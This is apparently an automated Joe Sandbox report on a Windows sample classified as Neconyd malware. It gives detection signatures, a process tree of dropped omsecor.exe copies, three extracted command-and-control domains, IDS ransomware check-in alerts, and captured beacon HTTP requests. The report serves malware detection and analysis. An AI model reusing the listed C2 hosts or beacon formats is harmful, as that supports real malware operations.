Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fmlgbgc2p5.exe

Overview

General Information

Sample name:fmlgbgc2p5.exe
renamed because original name is a hash value
Original sample name:8b0613982b6a7f0542a7dbfce43aa216a043ce9a2a2a24a7a2c77a6e8fa6aa72.exe
Analysis ID:1569339
MD5:809d8bedb2da450b588bf82e9a118fe4
SHA1:5cb2c9863ddc2ba5346967bf0780554c8dc120f9
SHA256:8b0613982b6a7f0542a7dbfce43aa216a043ce9a2a2a24a7a2c77a6e8fa6aa72
Tags:exeuser-adrian__luca
Infos:

Detection

Neconyd
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Neconyd
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • fmlgbgc2p5.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\fmlgbgc2p5.exe" MD5: 809D8BEDB2DA450B588BF82E9A118FE4)
    • fmlgbgc2p5.exe (PID: 7336 cmdline: C:\Users\user\Desktop\fmlgbgc2p5.exe MD5: 809D8BEDB2DA450B588BF82E9A118FE4)
      • omsecor.exe (PID: 7360 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 6E897A612472AD8B51062A6844A8A17B)
        • omsecor.exe (PID: 7452 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 6E897A612472AD8B51062A6844A8A17B)
          • omsecor.exe (PID: 8072 cmdline: C:\Windows\System32\omsecor.exe MD5: 678D56882701DBE0727C09DD075B56D1)
            • omsecor.exe (PID: 8100 cmdline: C:\Windows\SysWOW64\omsecor.exe MD5: 678D56882701DBE0727C09DD075B56D1)
              • omsecor.exe (PID: 8132 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: A4BA09D8D586AF0201C2E6584BE09E59)
                • omsecor.exe (PID: 396 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: A4BA09D8D586AF0201C2E6584BE09E59)
                  • omsecor.exe (PID: 7440 cmdline: C:\Windows\System32\omsecor.exe MD5: 75B0F2A9AD432A0DBC138A050D744956)
                    • omsecor.exe (PID: 7596 cmdline: C:\Windows\SysWOW64\omsecor.exe MD5: 75B0F2A9AD432A0DBC138A050D744956)
                      • omsecor.exe (PID: 7612 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 50E482AEFE2A49BBCB4AAEE1B8C70305)
                        • omsecor.exe (PID: 7296 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 50E482AEFE2A49BBCB4AAEE1B8C70305)
                        • WerFault.exe (PID: 1168 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 260 MD5: C31336C1EFC2CCB44B4326EA793040F2)
                    • WerFault.exe (PID: 336 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 248 MD5: C31336C1EFC2CCB44B4326EA793040F2)
                • WerFault.exe (PID: 424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8132 -s 276 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 8144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 280 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 7564 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 276 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["http://mkkuei4kdsz.com/", "http://ow5dirasuek.com/", "http://lousta.net/"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: fmlgbgc2p5.exe PID: 7280JoeSecurity_NeconydYara detected NeconydJoe Security
    Process Memory Space: fmlgbgc2p5.exe PID: 7336JoeSecurity_NeconydYara detected NeconydJoe Security
      Process Memory Space: omsecor.exe PID: 7360JoeSecurity_NeconydYara detected NeconydJoe Security
        Process Memory Space: omsecor.exe PID: 7452JoeSecurity_NeconydYara detected NeconydJoe Security
          Process Memory Space: omsecor.exe PID: 8072JoeSecurity_NeconydYara detected NeconydJoe Security
            Click to see the 7 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-05T18:09:19.895177+010020169981A Network Trojan was detected192.168.2.749708193.166.255.17180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-05T18:10:07.909220+010020181411A Network Trojan was detected52.34.198.22980192.168.2.749833TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-05T18:10:07.909220+010020377711A Network Trojan was detected52.34.198.22980192.168.2.749833TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-05T18:09:13.072527+010020157861Malware Command and Control Activity Detected192.168.2.750001193.166.255.17180TCP
            2024-12-05T18:09:41.929645+010020157861Malware Command and Control Activity Detected192.168.2.749708193.166.255.17180TCP
            2024-12-05T18:10:04.071060+010020157861Malware Command and Control Activity Detected192.168.2.749771193.166.255.17180TCP
            2024-12-05T18:10:05.646999+010020157861Malware Command and Control Activity Detected192.168.2.74982715.197.204.5680TCP
            2024-12-05T18:10:07.719093+010020157861Malware Command and Control Activity Detected192.168.2.74983352.34.198.22980TCP
            2024-12-05T18:10:32.196627+010020157861Malware Command and Control Activity Detected192.168.2.749844193.166.255.17180TCP
            2024-12-05T18:10:54.384861+010020157861Malware Command and Control Activity Detected192.168.2.749898193.166.255.17180TCP
            2024-12-05T18:10:55.730671+010020157861Malware Command and Control Activity Detected192.168.2.74995115.197.204.5680TCP
            2024-12-05T18:10:57.327496+010020157861Malware Command and Control Activity Detected192.168.2.74995552.34.198.22980TCP
            2024-12-05T18:11:21.525774+010020157861Malware Command and Control Activity Detected192.168.2.749963193.166.255.17180TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: fmlgbgc2p5.exeAvira: detected
            Source: http://mkkuei4kdsz.com/Avira URL Cloud: Label: phishing
            Source: http://mkkuei4kdsz.com/441/819.htmlAvira URL Cloud: Label: phishing
            Source: http://lousta.net/349/212.htmlAvira URL Cloud: Label: phishing
            Source: http://lousta.net/Avira URL Cloud: Label: phishing
            Source: http://lousta.net/952/351.htmlU?Avira URL Cloud: Label: phishing
            Source: http://lousta.net/952/351.html_Avira URL Cloud: Label: phishing
            Source: http://lousta.net/370/988.htmlAvira URL Cloud: Label: phishing
            Source: http://lousta.net/952/351.htmlf?Avira URL Cloud: Label: phishing
            Source: http://lousta.net/349/212.htmlDAvira URL Cloud: Label: phishing
            Source: http://lousta.net/952/351.htmlx?3Avira URL Cloud: Label: phishing
            Source: http://lousta.net/952/351.htmlshqos.dll.mui=Avira URL Cloud: Label: phishing
            Source: http://ow5dirasuek.com/612/675.htmlcAvira URL Cloud: Label: phishing
            Source: http://lousta.net/400/589.htmlAvira URL Cloud: Label: phishing
            Source: http://ow5dirasuek.com/612/675.htmlAvira URL Cloud: Label: phishing
            Source: http://mkkuei4kdsz.com/8Avira URL Cloud: Label: phishing
            Source: http://ow5dirasuek.com/612/675.html%Avira URL Cloud: Label: phishing
            Source: http://lousta.net/400/589.htmlxAvira URL Cloud: Label: phishing
            Source: http://lousta.net/rontdeskAvira URL Cloud: Label: phishing
            Source: http://lousta.net/206/582.htmlAvira URL Cloud: Label: phishing
            Source: http://ow5dirasuek.com/358/336.htmlAvira URL Cloud: Label: phishing
            Source: http://ow5dirasuek.com/~Avira URL Cloud: Label: phishing
            Source: http://lousta.net/952/351.html6Avira URL Cloud: Label: phishing
            Source: http://lousta.net/349/212.html5TAvira URL Cloud: Label: phishing
            Source: http://lousta.net/952/351.htmlAAvira URL Cloud: Label: phishing
            Source: http://lousta.net/952/351.htmlAvira URL Cloud: Label: phishing
            Source: http://mkkuei4kdsz.com/931/166.htmlAvira URL Cloud: Label: phishing
            Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconAvira URL Cloud: Label: phishing
            Source: http://ow5dirasuek.com/612/675.html-8a8d424fbe43573ef1LMEMAvira URL Cloud: Label: phishing
            Source: http://lousta.net/370/988.html=Avira URL Cloud: Label: phishing
            Source: http://lousta.net/206/582.htmlO2Avira URL Cloud: Label: phishing
            Source: http://lousta.net/0Avira URL Cloud: Label: phishing
            Source: http://lousta.net/349/212.html.TAvira URL Cloud: Label: phishing
            Source: http://lousta.net/952/351.html)Avira URL Cloud: Label: phishing
            Source: http://lousta.net/861/856.htmlAvira URL Cloud: Label: phishing
            Source: http://ow5dirasuek.com/Avira URL Cloud: Label: phishing
            Source: C:\Windows\SysWOW64\omsecor.exeAvira: detection malicious, Label: HEUR/AGEN.1352667
            Source: C:\Users\user\AppData\Roaming\omsecor.exeAvira: detection malicious, Label: HEUR/AGEN.1352667
            Source: 0.2.fmlgbgc2p5.exe.4a5548.1.unpackMalware Configuration Extractor: Neconyd {"C2 url": ["http://mkkuei4kdsz.com/", "http://ow5dirasuek.com/", "http://lousta.net/"]}
            Source: fmlgbgc2p5.exeReversingLabs: Detection: 89%
            Source: C:\Windows\SysWOW64\omsecor.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\omsecor.exeJoe Sandbox ML: detected
            Source: fmlgbgc2p5.exeJoe Sandbox ML: detected

            Compliance

            barindex
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeUnpacked PE file: 2.2.fmlgbgc2p5.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 7.2.omsecor.exe.400000.0.unpack
            Source: C:\Windows\SysWOW64\omsecor.exeUnpacked PE file: 14.2.omsecor.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 18.2.omsecor.exe.400000.0.unpack
            Source: C:\Windows\SysWOW64\omsecor.exeUnpacked PE file: 24.2.omsecor.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\omsecor.exeUnpacked PE file: 28.2.omsecor.exe.400000.0.unpack
            Source: fmlgbgc2p5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 0_2_004012C0 FindFirstFileA,0_2_004012C0
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040ABD9 FindFirstFileW,FindClose,2_2_0040ABD9
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,2_2_00408248
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 4_2_004012C0 FindFirstFileA,4_2_004012C0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_0040ABD9 FindFirstFileW,FindClose,7_2_0040ABD9
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,7_2_00408248
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_004012C0 FindFirstFileA,13_2_004012C0
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_0040ABD9 FindFirstFileW,FindClose,14_2_0040ABD9
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,14_2_00408248
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 16_2_004012C0 FindFirstFileA,16_2_004012C0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_0040ABD9 FindFirstFileW,FindClose,18_2_0040ABD9
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,18_2_00408248
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 23_2_004012C0 FindFirstFileA,23_2_004012C0
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_0040ABD9 FindFirstFileW,FindClose,24_2_0040ABD9
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,24_2_00408248
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 26_2_004012C0 FindFirstFileA,26_2_004012C0
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_0040ABD9 FindFirstFileW,FindClose,28_2_0040ABD9
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,28_2_00408248

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49708 -> 193.166.255.171:80
            Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49771 -> 193.166.255.171:80
            Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49833 -> 52.34.198.229:80
            Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49827 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49844 -> 193.166.255.171:80
            Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49898 -> 193.166.255.171:80
            Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49951 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49955 -> 52.34.198.229:80
            Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49963 -> 193.166.255.171:80
            Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:50001 -> 193.166.255.171:80
            Source: Malware configuration extractorURLs: http://mkkuei4kdsz.com/
            Source: Malware configuration extractorURLs: http://ow5dirasuek.com/
            Source: Malware configuration extractorURLs: http://lousta.net/
            Source: global trafficHTTP traffic detected: GET /370/988.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /400/589.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /931/166.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: mkkuei4kdsz.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /612/675.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: ow5dirasuek.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /206/582.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /861/856.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /441/819.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: mkkuei4kdsz.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /358/336.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=8.46.123.228; btst=761ae05900180e6968d7f120981b37d6|8.46.123.228|1733418607|1733418607|0|1|0
            Source: global trafficHTTP traffic detected: GET /349/212.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /952/351.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 193.166.255.171 193.166.255.171
            Source: Joe Sandbox ViewIP Address: 52.34.198.229 52.34.198.229
            Source: Joe Sandbox ViewASN Name: FUNETASFI FUNETASFI
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
            Source: Network trafficSuricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.7:49708 -> 193.166.255.171:80
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.7:49833
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.7:49833
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,2_2_00407036
            Source: global trafficHTTP traffic detected: GET /370/988.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /400/589.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /931/166.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: mkkuei4kdsz.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /612/675.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: ow5dirasuek.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /206/582.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /861/856.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /441/819.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: mkkuei4kdsz.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /358/336.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=8.46.123.228; btst=761ae05900180e6968d7f120981b37d6|8.46.123.228|1733418607|1733418607|0|1|0
            Source: global trafficHTTP traffic detected: GET /349/212.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /952/351.html HTTP/1.1From: 133778921561632797Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148Host: lousta.netConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: lousta.net
            Source: global trafficDNS traffic detected: DNS query: mkkuei4kdsz.com
            Source: global trafficDNS traffic detected: DNS query: ow5dirasuek.com
            Source: omsecor.exeString found in binary or memory: http://lousta.net/
            Source: omsecor.exe, 0000001C.00000002.2589203177.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/0
            Source: omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/206/582.html
            Source: omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/206/582.htmlO2
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/349/212.html
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/349/212.html.T
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/349/212.html5T
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/349/212.htmlD
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/349/212.htmld
            Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/370/988.html
            Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/370/988.html=
            Source: omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/400/589.html
            Source: omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/400/589.htmlx
            Source: omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.00000000006C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/861/856.html
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589203177.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/952/351.html
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/952/351.html)
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/952/351.html6
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/952/351.htmlA
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/952/351.htmlU?
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/952/351.html_
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/952/351.htmlf?
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/952/351.htmlshqos.dll.mui=
            Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/952/351.htmlx?3
            Source: omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/rontdesk
            Source: omsecor.exeString found in binary or memory: http://mkkuei4kdsz.com/
            Source: omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/441/819.html
            Source: omsecor.exe, 00000007.00000002.1840387008.0000000000622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/8
            Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840387008.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/931/166.html
            Source: omsecor.exeString found in binary or memory: http://ow5dirasuek.com/
            Source: omsecor.exe, 00000012.00000002.2334288604.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/358/336.html
            Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840198847.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/612/675.html
            Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/612/675.html%
            Source: omsecor.exe, 00000007.00000002.1840387008.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/612/675.html-8a8d424fbe43573ef1LMEM
            Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/612/675.htmlc
